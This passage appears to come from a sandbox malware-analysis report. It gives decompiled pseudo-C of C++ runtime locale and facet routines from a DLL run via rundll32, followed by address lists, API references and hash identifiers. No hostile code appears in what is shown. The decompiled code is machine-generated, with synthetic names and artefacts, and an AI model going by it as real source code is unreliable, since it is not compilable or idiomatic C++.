																						 *(_t902 - 0x10) = _t845;
																						 *(_t902 - 4) = 1;
																						E6E206FD3(__eflags, _t845);
																						 *0x6e26a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t845 + 4))))();
																						 *0x6e2c6dbc = _t845;
																						goto L40;
																					}
																				} else {
																					_t845 = _t866;
																					goto L40;
																				}
																			}
																		} else {
																			_t844 =  *(_t902 - 0x10);
																			 *(_t902 - 0x10) = _t844;
																			 *(_t902 - 4) = 1;
																			E6E206FD3(__eflags, _t844);
																			 *0x6e26a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t844 + 4))))();
																			 *0x6e2c6dec = _t844;
																			goto L33;
																		}
																	} else {
																		_t844 = _t865;
																		goto L33;
																	}
																}
															} else {
																_t843 =  *(_t902 - 0x10);
																 *(_t902 - 0x10) = _t843;
																 *(_t902 - 4) = 1;
																E6E206FD3(__eflags, _t843);
																 *0x6e26a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t843 + 4))))();
																 *0x6e2c6db8 = _t843;
																goto L26;
															}
														} else {
															_t843 = _t864;
															goto L26;
														}
													}
												} else {
													_t842 =  *(_t902 - 0x10);
													 *(_t902 - 0x10) = _t842;
													 *(_t902 - 4) = 1;
													E6E206FD3(__eflags, _t842);
													 *0x6e26a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t842 + 4))))();
													 *0x6e2c6de8 = _t842;
													goto L19;
												}
											} else {
												_t842 = _t863;
												goto L19;
											}
										}
									} else {
										_t841 =  *(_t902 - 0x10);
										 *(_t902 - 0x10) = _t841;
										 *(_t902 - 4) = 1;
										E6E206FD3(__eflags, _t841);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t841 + 4))))();
										 *0x6e2c6dd4 = _t841;
										goto L12;
									}
								} else {
									_t841 = _t862;
									goto L12;
								}
							}
						} else {
							_t840 =  *(_t902 - 0x10);
							 *(_t902 - 0x10) = _t840;
							 *(_t902 - 4) = 1;
							E6E206FD3(__eflags, _t840);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t840 + 4))))();
							 *0x6e2c6db4 = _t840;
							goto L5;
						}
					} else {
						_t840 = _t861;
						goto L5;
					}
				}
			}


































































                          0x6e20f037
                          0x6e20f037
                          0x6e20f03e
                          0x6e20f048
                          0x6e20f04d
                          0x6e20f058
                          0x6e20f05c
                          0x6e20f05f
                          0x6e20f064
                          0x6e20f068
                          0x6e20f06d
                          0x6e20f071
                          0x6e20f0b6
                          0x6e20f0b9
                          0x6e20f0c5
                          0x6e20f073
                          0x6e20f075
                          0x6e20f07b
                          0x6e20f081
                          0x6e20f089
                          0x6e20f08c
                          0x6e20f0c9
                          0x6e20f0d7
                          0x6e20f0dc
                          0x6e20f0e4
                          0x6e20f0ee
                          0x6e20f0f3
                          0x6e20f0fe
                          0x6e20f102
                          0x6e20f105
                          0x6e20f10a
                          0x6e20f113
                          0x6e20f115
                          0x6e20f117
                          0x6e20f15c
                          0x6e20f15f
                          0x6e20f16b
                          0x6e20f119
                          0x6e20f119
                          0x6e20f11b
                          0x6e20f121
                          0x6e20f127
                          0x6e20f12f
                          0x6e20f132
                          0x6e20f16f
                          0x6e20f17d
                          0x6e20f182
                          0x6e20f18a
                          0x6e20f194
                          0x6e20f199
                          0x6e20f1a4
                          0x6e20f1a8
                          0x6e20f1ab
                          0x6e20f1b0
                          0x6e20f1b9
                          0x6e20f1bb
                          0x6e20f1bd
                          0x6e20f202
                          0x6e20f205
                          0x6e20f211
                          0x6e20f1bf
                          0x6e20f1bf
                          0x6e20f1c1
                          0x6e20f1c7
                          0x6e20f1cd
                          0x6e20f1d5
                          0x6e20f1d8
                          0x6e20f215
                          0x6e20f223
                          0x6e20f228
                          0x6e20f230
                          0x6e20f23a
                          0x6e20f23f
                          0x6e20f24a
                          0x6e20f24e
                          0x6e20f251
                          0x6e20f256
                          0x6e20f25f
                          0x6e20f261
                          0x6e20f263
                          0x6e20f2a8
                          0x6e20f2ab
                          0x6e20f2b7
                          0x6e20f265
                          0x6e20f265
                          0x6e20f267
                          0x6e20f26d
                          0x6e20f273
                          0x6e20f27b
                          0x6e20f27e
                          0x6e20f2bb
                          0x6e20f2c9
                          0x6e20f2ce
                          0x6e20f2d6
                          0x6e20f2e0
                          0x6e20f2e5
                          0x6e20f2f0
                          0x6e20f2f4
                          0x6e20f2f7
                          0x6e20f2fc
                          0x6e20f305
                          0x6e20f307
                          0x6e20f309
                          0x6e20f34e
                          0x6e20f351
                          0x6e20f35d
                          0x6e20f30b
                          0x6e20f30b
                          0x6e20f30d
                          0x6e20f313
                          0x6e20f319
                          0x6e20f321
                          0x6e20f324
                          0x6e20f361
                          0x6e20f36f
                          0x6e20f374
                          0x6e20f37c
                          0x6e20f386
                          0x6e20f38b
                          0x6e20f396
                          0x6e20f39a
                          0x6e20f39d
                          0x6e20f3a2
                          0x6e20f3ab
                          0x6e20f3ad
                          0x6e20f3af
                          0x6e20f3f4
                          0x6e20f3f7
                          0x6e20f403
                          0x6e20f3b1
                          0x6e20f3b1
                          0x6e20f3b3
                          0x6e20f3b9
                          0x6e20f3bf
                          0x6e20f3c7
                          0x6e20f3ca
                          0x6e20f407
                          0x6e20f415
                          0x6e20f41a
                          0x6e20f422
                          0x6e20f42c
                          0x6e20f431
                          0x6e20f43c
                          0x6e20f440
                          0x6e20f443
                          0x6e20f448
                          0x6e20f451
                          0x6e20f453
                          0x6e20f455
                          0x6e20f49a
                          0x6e20f49d
                          0x6e20f4a9
                          0x6e20f457
                          0x6e20f457
                          0x6e20f459
                          0x6e20f45f
                          0x6e20f465
                          0x6e20f46d
                          0x6e20f470
                          0x6e20f4ad
                          0x6e20f4bb
                          0x6e20f4c0
                          0x6e20f4c8
                          0x6e20f4d2
                          0x6e20f4d7
                          0x6e20f4e2
                          0x6e20f4e6
                          0x6e20f4e9
                          0x6e20f4ee
                          0x6e20f4f7
                          0x6e20f4f9
                          0x6e20f4fb
                          0x6e20f540
                          0x6e20f543
                          0x6e20f54f
                          0x6e20f4fd
                          0x6e20f4fd
                          0x6e20f4ff
                          0x6e20f505
                          0x6e20f50b
                          0x6e20f513
                          0x6e20f516
                          0x6e20f553
                          0x6e20f561
                          0x6e20f566
                          0x6e20f56e
                          0x6e20f578
                          0x6e20f57d
                          0x6e20f588
                          0x6e20f58c
                          0x6e20f58f
                          0x6e20f594
                          0x6e20f59d
                          0x6e20f59f
                          0x6e20f5a1
                          0x6e20f5e6
                          0x6e20f5e9
                          0x6e20f5f5
                          0x6e20f5a3
                          0x6e20f5a3
                          0x6e20f5a5
                          0x6e20f5ab
                          0x6e20f5b1
                          0x6e20f5b9
                          0x6e20f5bc
                          0x6e20f5f9
                          0x6e20f607
                          0x6e20f60c
                          0x6e20f614
                          0x6e20f61e
                          0x6e20f623
                          0x6e20f62e
                          0x6e20f632
                          0x6e20f635
                          0x6e20f63a
                          0x6e20f643
                          0x6e20f645
                          0x6e20f647
                          0x6e20f68c
                          0x6e20f68f
                          0x6e20f69b
                          0x6e20f649
                          0x6e20f649
                          0x6e20f64b
                          0x6e20f651
                          0x6e20f657
                          0x6e20f65f
                          0x6e20f662
                          0x6e20f69f
                          0x6e20f6ad
                          0x6e20f6b2
                          0x6e20f6ba
                          0x6e20f6c4
                          0x6e20f6c9
                          0x6e20f6d4
                          0x6e20f6d8
                          0x6e20f6db
                          0x6e20f6e0
                          0x6e20f6e9
                          0x6e20f6eb
                          0x6e20f6ed
                          0x6e20f732
                          0x6e20f735
                          0x6e20f741
                          0x6e20f6ef
                          0x6e20f6ef
                          0x6e20f6f1
                          0x6e20f6f7
                          0x6e20f6fd
                          0x6e20f705
                          0x6e20f708
                          0x6e20f745
                          0x6e20f753
                          0x6e20f758
                          0x6e20f760
                          0x6e20f76a
                          0x6e20f76f
                          0x6e20f77a
                          0x6e20f77e
                          0x6e20f781
                          0x6e20f786
                          0x6e20f78f
                          0x6e20f791
                          0x6e20f793
                          0x6e20f7d8
                          0x6e20f7db
                          0x6e20f7e7
                          0x6e20f795
                          0x6e20f795
                          0x6e20f797
                          0x6e20f79d
                          0x6e20f7a3
                          0x6e20f7ab
                          0x6e20f7ae
                          0x6e20f7eb
                          0x6e20f7f9
                          0x6e20f7fe
                          0x6e20f806
                          0x6e20f810
                          0x6e20f815
                          0x6e20f820
                          0x6e20f824
                          0x6e20f827
                          0x6e20f82c
                          0x6e20f835
                          0x6e20f837
                          0x6e20f839
                          0x6e20f87e
                          0x6e20f881
                          0x6e20f88d
                          0x6e20f83b
                          0x6e20f83b
                          0x6e20f83d
                          0x6e20f843
                          0x6e20f849
                          0x6e20f851
                          0x6e20f854
                          0x6e20f891
                          0x6e20f89f
                          0x6e20f8a4
                          0x6e20f8ac
                          0x6e20f8b6
                          0x6e20f8bb
                          0x6e20f8c6
                          0x6e20f8ca
                          0x6e20f8cd
                          0x6e20f8d2
                          0x6e20f8db
                          0x6e20f8dd
                          0x6e20f8df
                          0x6e20f924
                          0x6e20f927
                          0x6e20f933
                          0x6e20f8e1
                          0x6e20f8e1
                          0x6e20f8e3
                          0x6e20f8e9
                          0x6e20f8ef
                          0x6e20f8f7
                          0x6e20f8fa
                          0x6e20f937
                          0x6e20f945
                          0x6e20f94a
                          0x6e20f952
                          0x6e20f95c
                          0x6e20f961
                          0x6e20f96c
                          0x6e20f970
                          0x6e20f973
                          0x6e20f978
                          0x6e20f981
                          0x6e20f983
                          0x6e20f985
                          0x6e20f9ca
                          0x6e20f9cd
                          0x6e20f9d9
                          0x6e20f987
                          0x6e20f987
                          0x6e20f989
                          0x6e20f98f
                          0x6e20f995
                          0x6e20f99d
                          0x6e20f9a0
                          0x6e20f9dd
                          0x6e20f9eb
                          0x6e20f9f0
                          0x6e20f9f8
                          0x6e20fa02
                          0x6e20fa07
                          0x6e20fa12
                          0x6e20fa16
                          0x6e20fa19
                          0x6e20fa1e
                          0x6e20fa27
                          0x6e20fa29
                          0x6e20fa2b
                          0x6e20fa70
                          0x6e20fa73
                          0x6e20fa7f
                          0x6e20fa2d
                          0x6e20fa2d
                          0x6e20fa2f
                          0x6e20fa35
                          0x6e20fa3b
                          0x6e20fa43
                          0x6e20fa46
                          0x6e20fa83
                          0x6e20fa91
                          0x6e20fa96
                          0x6e20fa9e
                          0x6e20faa8
                          0x6e20faad
                          0x6e20fab8
                          0x6e20fabc
                          0x6e20fabf
                          0x6e20fac4
                          0x6e20facd
                          0x6e20facf
                          0x6e20fad1
                          0x6e20fb16
                          0x6e20fb19
                          0x6e20fb25
                          0x6e20fad3
                          0x6e20fad3
                          0x6e20fad5
                          0x6e20fadb
                          0x6e20fae1
                          0x6e20fae9
                          0x6e20faec
                          0x6e20fb29
                          0x6e20fb37
                          0x6e20fb3c
                          0x6e20fb44
                          0x6e20fb4e
                          0x6e20fb53
                          0x6e20fb5e
                          0x6e20fb62
                          0x6e20fb65
                          0x6e20fb6a
                          0x6e20fb73
                          0x6e20fb75
                          0x6e20fb77
                          0x6e20fbbc
                          0x6e20fbbf
                          0x6e20fbcb
                          0x6e20fb79
                          0x6e20fb79
                          0x6e20fb7b
                          0x6e20fb81
                          0x6e20fb87
                          0x6e20fb8f
                          0x6e20fb92
                          0x6e20fbcf
                          0x6e20fbdd
                          0x6e20fbe2
                          0x6e20fbea
                          0x6e20fbf4
                          0x6e20fbf9
                          0x6e20fc04
                          0x6e20fc08
                          0x6e20fc0b
                          0x6e20fc10
                          0x6e20fc19
                          0x6e20fc1b
                          0x6e20fc1d
                          0x6e20fc62
                          0x6e20fc65
                          0x6e20fc71
                          0x6e20fc1f
                          0x6e20fc1f
                          0x6e20fc21
                          0x6e20fc27
                          0x6e20fc2d
                          0x6e20fc35
                          0x6e20fc38
                          0x6e20fc75
                          0x6e20fc83
                          0x6e20fc88
                          0x6e20fc90
                          0x6e20fc9a
                          0x6e20fc9f
                          0x6e20fcaa
                          0x6e20fcae
                          0x6e20fcb1
                          0x6e20fcb6
                          0x6e20fcbf
                          0x6e20fcc1
                          0x6e20fcc3
                          0x6e20fd08
                          0x6e20fd0b
                          0x6e20fd17
                          0x6e20fcc5
                          0x6e20fcc5
                          0x6e20fcc7
                          0x6e20fccd
                          0x6e20fcd3
                          0x6e20fcdb
                          0x6e20fcde
                          0x6e20fd18
                          0x6e20fd1b
                          0x6e20fd29
                          0x6e20fd2e
                          0x6e20fd36
                          0x6e20fd3b
                          0x6e20fd3d
                          0x6e20fd43
                          0x6e20fd46
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd53
                          0x6e20fd59
                          0x6e20fd5c
                          0x6e20fd68
                          0x6e20fce0
                          0x6e20fce0
                          0x6e20fce3
                          0x6e20fce7
                          0x6e20fceb
                          0x6e20fcf8
                          0x6e20fd00
                          0x6e20fd02
                          0x00000000
                          0x6e20fd02
                          0x6e20fcc9
                          0x6e20fcc9
                          0x00000000
                          0x6e20fcc9
                          0x6e20fcc7
                          0x6e20fc3a
                          0x6e20fc3a
                          0x6e20fc3d
                          0x6e20fc41
                          0x6e20fc45
                          0x6e20fc52
                          0x6e20fc5a
                          0x6e20fc5c
                          0x00000000
                          0x6e20fc5c
                          0x6e20fc23
                          0x6e20fc23
                          0x00000000
                          0x6e20fc23
                          0x6e20fc21
                          0x6e20fb94
                          0x6e20fb94
                          0x6e20fb97
                          0x6e20fb9b
                          0x6e20fb9f
                          0x6e20fbac
                          0x6e20fbb4
                          0x6e20fbb6
                          0x00000000
                          0x6e20fbb6
                          0x6e20fb7d
                          0x6e20fb7d
                          0x00000000
                          0x6e20fb7d
                          0x6e20fb7b
                          0x6e20faee
                          0x6e20faee
                          0x6e20faf1
                          0x6e20faf5
                          0x6e20faf9
                          0x6e20fb06
                          0x6e20fb0e
                          0x6e20fb10
                          0x00000000
                          0x6e20fb10
                          0x6e20fad7
                          0x6e20fad7
                          0x00000000
                          0x6e20fad7
                          0x6e20fad5
                          0x6e20fa48
                          0x6e20fa48
                          0x6e20fa4b
                          0x6e20fa4f
                          0x6e20fa53
                          0x6e20fa60
                          0x6e20fa68
                          0x6e20fa6a
                          0x00000000
                          0x6e20fa6a
                          0x6e20fa31
                          0x6e20fa31
                          0x00000000
                          0x6e20fa31
                          0x6e20fa2f
                          0x6e20f9a2
                          0x6e20f9a2
                          0x6e20f9a5
                          0x6e20f9a9
                          0x6e20f9ad
                          0x6e20f9ba
                          0x6e20f9c2
                          0x6e20f9c4
                          0x00000000
                          0x6e20f9c4
                          0x6e20f98b
                          0x6e20f98b
                          0x00000000
                          0x6e20f98b
                          0x6e20f989
                          0x6e20f8fc
                          0x6e20f8fc
                          0x6e20f8ff
                          0x6e20f903
                          0x6e20f907
                          0x6e20f914
                          0x6e20f91c
                          0x6e20f91e
                          0x00000000
                          0x6e20f91e
                          0x6e20f8e5
                          0x6e20f8e5
                          0x00000000
                          0x6e20f8e5
                          0x6e20f8e3
                          0x6e20f856
                          0x6e20f856
                          0x6e20f859
                          0x6e20f85d
                          0x6e20f861
                          0x6e20f86e
                          0x6e20f876
                          0x6e20f878
                          0x00000000
                          0x6e20f878
                          0x6e20f83f
                          0x6e20f83f
                          0x00000000
                          0x6e20f83f
                          0x6e20f83d
                          0x6e20f7b0
                          0x6e20f7b0
                          0x6e20f7b3
                          0x6e20f7b7
                          0x6e20f7bb
                          0x6e20f7c8
                          0x6e20f7d0
                          0x6e20f7d2
                          0x00000000
                          0x6e20f7d2
                          0x6e20f799
                          0x6e20f799
                          0x00000000
                          0x6e20f799
                          0x6e20f797
                          0x6e20f70a
                          0x6e20f70a
                          0x6e20f70d
                          0x6e20f711
                          0x6e20f715
                          0x6e20f722
                          0x6e20f72a
                          0x6e20f72c
                          0x00000000
                          0x6e20f72c
                          0x6e20f6f3
                          0x6e20f6f3
                          0x00000000
                          0x6e20f6f3
                          0x6e20f6f1
                          0x6e20f664
                          0x6e20f664
                          0x6e20f667
                          0x6e20f66b
                          0x6e20f66f
                          0x6e20f67c
                          0x6e20f684
                          0x6e20f686
                          0x00000000
                          0x6e20f686
                          0x6e20f64d
                          0x6e20f64d
                          0x00000000
                          0x6e20f64d
                          0x6e20f64b
                          0x6e20f5be
                          0x6e20f5be
                          0x6e20f5c1
                          0x6e20f5c5
                          0x6e20f5c9
                          0x6e20f5d6
                          0x6e20f5de
                          0x6e20f5e0
                          0x00000000
                          0x6e20f5e0
                          0x6e20f5a7
                          0x6e20f5a7
                          0x00000000
                          0x6e20f5a7
                          0x6e20f5a5
                          0x6e20f518
                          0x6e20f518
                          0x6e20f51b
                          0x6e20f51f
                          0x6e20f523
                          0x6e20f530
                          0x6e20f538
                          0x6e20f53a
                          0x00000000
                          0x6e20f53a
                          0x6e20f501
                          0x6e20f501
                          0x00000000
                          0x6e20f501
                          0x6e20f4ff
                          0x6e20f472
                          0x6e20f472
                          0x6e20f475
                          0x6e20f479
                          0x6e20f47d
                          0x6e20f48a
                          0x6e20f492
                          0x6e20f494
                          0x00000000
                          0x6e20f494
                          0x6e20f45b
                          0x6e20f45b
                          0x00000000
                          0x6e20f45b
                          0x6e20f459
                          0x6e20f3cc
                          0x6e20f3cc
                          0x6e20f3cf
                          0x6e20f3d3
                          0x6e20f3d7
                          0x6e20f3e4
                          0x6e20f3ec
                          0x6e20f3ee
                          0x00000000
                          0x6e20f3ee
                          0x6e20f3b5
                          0x6e20f3b5
                          0x00000000
                          0x6e20f3b5
                          0x6e20f3b3
                          0x6e20f326
                          0x6e20f326
                          0x6e20f329
                          0x6e20f32d
                          0x6e20f331
                          0x6e20f33e
                          0x6e20f346
                          0x6e20f348
                          0x00000000
                          0x6e20f348
                          0x6e20f30f
                          0x6e20f30f
                          0x00000000
                          0x6e20f30f
                          0x6e20f30d
                          0x6e20f280
                          0x6e20f280
                          0x6e20f283
                          0x6e20f287
                          0x6e20f28b
                          0x6e20f298
                          0x6e20f2a0
                          0x6e20f2a2
                          0x00000000
                          0x6e20f2a2
                          0x6e20f269
                          0x6e20f269
                          0x00000000
                          0x6e20f269
                          0x6e20f267
                          0x6e20f1da
                          0x6e20f1da
                          0x6e20f1dd
                          0x6e20f1e1
                          0x6e20f1e5
                          0x6e20f1f2
                          0x6e20f1fa
                          0x6e20f1fc
                          0x00000000
                          0x6e20f1fc
                          0x6e20f1c3
                          0x6e20f1c3
                          0x00000000
                          0x6e20f1c3
                          0x6e20f1c1
                          0x6e20f134
                          0x6e20f134
                          0x6e20f137
                          0x6e20f13b
                          0x6e20f13f
                          0x6e20f14c
                          0x6e20f154
                          0x6e20f156
                          0x00000000
                          0x6e20f156
                          0x6e20f11d
                          0x6e20f11d
                          0x00000000
                          0x6e20f11d
                          0x6e20f11b
                          0x6e20f08e
                          0x6e20f08e
                          0x6e20f091
                          0x6e20f095
                          0x6e20f099
                          0x6e20f0a6
                          0x6e20f0ae
                          0x6e20f0b0
                          0x00000000
                          0x6e20f0b0
                          0x6e20f077
                          0x6e20f077
                          0x00000000
                          0x6e20f077
                          0x6e20f075

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E20F03E
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E20F048
                          • int.LIBCPMT ref: 6E20F05F
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • collate.LIBCPMT ref: 6E20F082
                          • std::_Facet_Register.LIBCPMT ref: 6E20F099
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E20F0B9
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E20F0D7
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.483288618.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000003.00000002.483284816.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483332321.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483367165.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483373942.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483378050.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcollate
                          • String ID: hm,n
                          • API String ID: 2363045490-216170354
                          • Opcode ID: 369bf358384b0891e81e77dbc458c43d2a7b9511c54c6e9f5a7545020ce64823
                          • Instruction ID: 8519a0802e7460ad01b3930bf57e452b782981e6e66726a5dec00c1ad9930e6d
                          • Opcode Fuzzy Hash: 369bf358384b0891e81e77dbc458c43d2a7b9511c54c6e9f5a7545020ce64823
                          • Instruction Fuzzy Hash: 8C110676D0051ECBCF00DBE0C894AEEB7BBAF84715F240908E4106B2D4DBB59A45C791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E20A0FF, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 72%
                          			E6E20A0FF(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a8) {
				signed int _v4;
				intOrPtr _v8;
				void* _v16;
				char _v20;
				intOrPtr* _v24;
				char _v32;
				void* _t63;
				intOrPtr* _t64;
				void* _t76;
				void* _t89;
				void* _t102;
				intOrPtr* _t158;
				intOrPtr* _t174;
				intOrPtr* _t175;
				intOrPtr* _t176;
				void* _t178;
				intOrPtr* _t179;
				intOrPtr* _t180;
				void* _t181;

				_t171 = __edx;
				_t130 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653( &_v20, 0);
				_t178 =  *0x6e2c6cc8; // 0x0
				_v4 = _v4 & 0x00000000;
				_v16 = _t178;
				_t63 = E6E1E161C(0x6e2c6b38);
				_t133 = _a8;
				_t64 = E6E1E171B(_a8, _t63);
				_t173 = _t64;
				if(_t64 != 0) {
					L5:
					E6E2066BA( &_v20);
					return E6E220075(_t173);
				} else {
					if(_t178 == 0) {
						_push(_a8);
						_push( &_v16);
						__eflags = E6E20A9D2(__ebx, _t133, __edx, _t173, _t178) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438( &_v32);
							E6E223D74( &_v32, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t173, _t178, 0x14);
							E6E206653( &_v20, 0);
							_t179 =  *0x6e2c6ccc; // 0x0
							_v4 = _v4 & 0x00000000;
							_v16 = _t179;
							_t76 = E6E1E161C(0x6e2c6cb8);
							_t140 = _a8;
							_t174 = E6E1E171B(_a8, _t76);
							__eflags = _t174;
							if(_t174 != 0) {
								L12:
								E6E2066BA( &_v20);
								return E6E220075(_t174);
							} else {
								__eflags = _t179;
								if(_t179 == 0) {
									_push(_a8);
									_push( &_v16);
									__eflags = E6E20AA38(_t130, _t140, __edx, _t174, _t179) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438( &_v32);
										E6E223D74( &_v32, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t130, _t174, _t179, 0x14);
										E6E206653( &_v20, 0);
										_t180 =  *0x6e2c6cd0; // 0x0
										_v4 = _v4 & 0x00000000;
										_v16 = _t180;
										_t89 = E6E1E161C(0x6e2c6cbc);
										_t147 = _a8;
										_t175 = E6E1E171B(_a8, _t89);
										__eflags = _t175;
										if(_t175 != 0) {
											L19:
											E6E2066BA( &_v20);
											return E6E220075(_t175);
										} else {
											__eflags = _t180;
											if(_t180 == 0) {
												_push(_a8);
												_push( &_v16);
												__eflags = E6E20AAA0(_t130, _t147, __edx, _t175, _t180) - 0xffffffff;
												if(__eflags == 0) {
													E6E1E1438( &_v32);
													E6E223D74( &_v32, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e2683cf, _t130, _t175, _t180, 0x14);
													E6E206653( &_v20, 0);
													_t181 =  *0x6e2c6cd4; // 0x0
													_v4 = _v4 & 0x00000000;
													_v16 = _t181;
													_t102 = E6E1E161C(0x6e2c6cc0);
													_t154 = _a8;
													_t176 = E6E1E171B(_a8, _t102);
													__eflags = _t176;
													if(_t176 != 0) {
														L26:
														E6E2066BA( &_v20);
														return E6E220075(_t176);
													} else {
														__eflags = _t181;
														if(_t181 == 0) {
															_push(_a8);
															_push( &_v16);
															__eflags = E6E20AB08(_t130, _t154, _t171, _t176, _t181) - 0xffffffff;
															if(__eflags == 0) {
																_t158 =  &_v32;
																E6E1E1438(_t158);
																E6E223D74( &_v32, 0x6e2c3504);
																asm("int3");
																_push(_t158);
																 *((intOrPtr*)(_t158 + 4)) = _v8;
																_v24 = _t158;
																 *_t158 = 0x6e26ba24;
																return _t158;
															} else {
																_t176 = _v16;
																_v16 = _t176;
																_v4 = 1;
																E6E206FD3(__eflags, _t176);
																 *0x6e26a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t176 + 4))))();
																 *0x6e2c6cd4 = _t176;
																goto L26;
															}
														} else {
															_t176 = _t181;
															goto L26;
														}
													}
												} else {
													_t175 = _v16;
													_v16 = _t175;
													_v4 = 1;
													E6E206FD3(__eflags, _t175);
													 *0x6e26a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t175 + 4))))();
													 *0x6e2c6cd0 = _t175;
													goto L19;
												}
											} else {
												_t175 = _t180;
												goto L19;
											}
										}
									} else {
										_t174 = _v16;
										_v16 = _t174;
										_v4 = 1;
										E6E206FD3(__eflags, _t174);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t174 + 4))))();
										 *0x6e2c6ccc = _t174;
										goto L12;
									}
								} else {
									_t174 = _t179;
									goto L12;
								}
							}
						} else {
							_t173 = _v16;
							_v16 = _t173;
							_v4 = 1;
							E6E206FD3(__eflags, _t173);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t173 + 4))))();
							 *0x6e2c6cc8 = _t173;
							goto L5;
						}
					} else {
						_t173 = _t178;
						goto L5;
					}
				}
			}






















                          0x6e20a0ff
                          0x6e20a0ff
                          0x6e20a106
                          0x6e20a110
                          0x6e20a115
                          0x6e20a120
                          0x6e20a124
                          0x6e20a127
                          0x6e20a12c
                          0x6e20a130
                          0x6e20a135
                          0x6e20a139
                          0x6e20a17e
                          0x6e20a181
                          0x6e20a18d
                          0x6e20a13b
                          0x6e20a13d
                          0x6e20a143
                          0x6e20a149
                          0x6e20a151
                          0x6e20a154
                          0x6e20a191
                          0x6e20a19f
                          0x6e20a1a4
                          0x6e20a1ac
                          0x6e20a1b6
                          0x6e20a1bb
                          0x6e20a1c6
                          0x6e20a1ca
                          0x6e20a1cd
                          0x6e20a1d2
                          0x6e20a1db
                          0x6e20a1dd
                          0x6e20a1df
                          0x6e20a224
                          0x6e20a227
                          0x6e20a233
                          0x6e20a1e1
                          0x6e20a1e1
                          0x6e20a1e3
                          0x6e20a1e9
                          0x6e20a1ef
                          0x6e20a1f7
                          0x6e20a1fa
                          0x6e20a237
                          0x6e20a245
                          0x6e20a24a
                          0x6e20a252
                          0x6e20a25c
                          0x6e20a261
                          0x6e20a26c
                          0x6e20a270
                          0x6e20a273
                          0x6e20a278
                          0x6e20a281
                          0x6e20a283
                          0x6e20a285
                          0x6e20a2ca
                          0x6e20a2cd
                          0x6e20a2d9
                          0x6e20a287
                          0x6e20a287
                          0x6e20a289
                          0x6e20a28f
                          0x6e20a295
                          0x6e20a29d
                          0x6e20a2a0
                          0x6e20a2dd
                          0x6e20a2eb
                          0x6e20a2f0
                          0x6e20a2f8
                          0x6e20a302
                          0x6e20a307
                          0x6e20a312
                          0x6e20a316
                          0x6e20a319
                          0x6e20a31e
                          0x6e20a327
                          0x6e20a329
                          0x6e20a32b
                          0x6e20a370
                          0x6e20a373
                          0x6e20a37f
                          0x6e20a32d
                          0x6e20a32d
                          0x6e20a32f
                          0x6e20a335
                          0x6e20a33b
                          0x6e20a343
                          0x6e20a346
                          0x6e20a380
                          0x6e20a383
                          0x6e20a391
                          0x6e20a396
                          0x6e20a39a
                          0x6e20a39e
                          0x6e20a3a3
                          0x6e20a3a6
                          0x6e20a3ad
                          0x6e20a348
                          0x6e20a348
                          0x6e20a34b
                          0x6e20a34f
                          0x6e20a353
                          0x6e20a360
                          0x6e20a368
                          0x6e20a36a
                          0x00000000
                          0x6e20a36a
                          0x6e20a331
                          0x6e20a331
                          0x00000000
                          0x6e20a331
                          0x6e20a32f
                          0x6e20a2a2
                          0x6e20a2a2
                          0x6e20a2a5
                          0x6e20a2a9
                          0x6e20a2ad
                          0x6e20a2ba
                          0x6e20a2c2
                          0x6e20a2c4
                          0x00000000
                          0x6e20a2c4
                          0x6e20a28b
                          0x6e20a28b
                          0x00000000
                          0x6e20a28b
                          0x6e20a289
                          0x6e20a1fc
                          0x6e20a1fc
                          0x6e20a1ff
                          0x6e20a203
                          0x6e20a207
                          0x6e20a214
                          0x6e20a21c
                          0x6e20a21e
                          0x00000000
                          0x6e20a21e
                          0x6e20a1e5
                          0x6e20a1e5
                          0x00000000
                          0x6e20a1e5
                          0x6e20a1e3
                          0x6e20a156
                          0x6e20a156
                          0x6e20a159
                          0x6e20a15d
                          0x6e20a161
                          0x6e20a16e
                          0x6e20a176
                          0x6e20a178
                          0x00000000
                          0x6e20a178
                          0x6e20a13f
                          0x6e20a13f
                          0x00000000
                          0x6e20a13f
                          0x6e20a13d

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E20A106
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E20A110
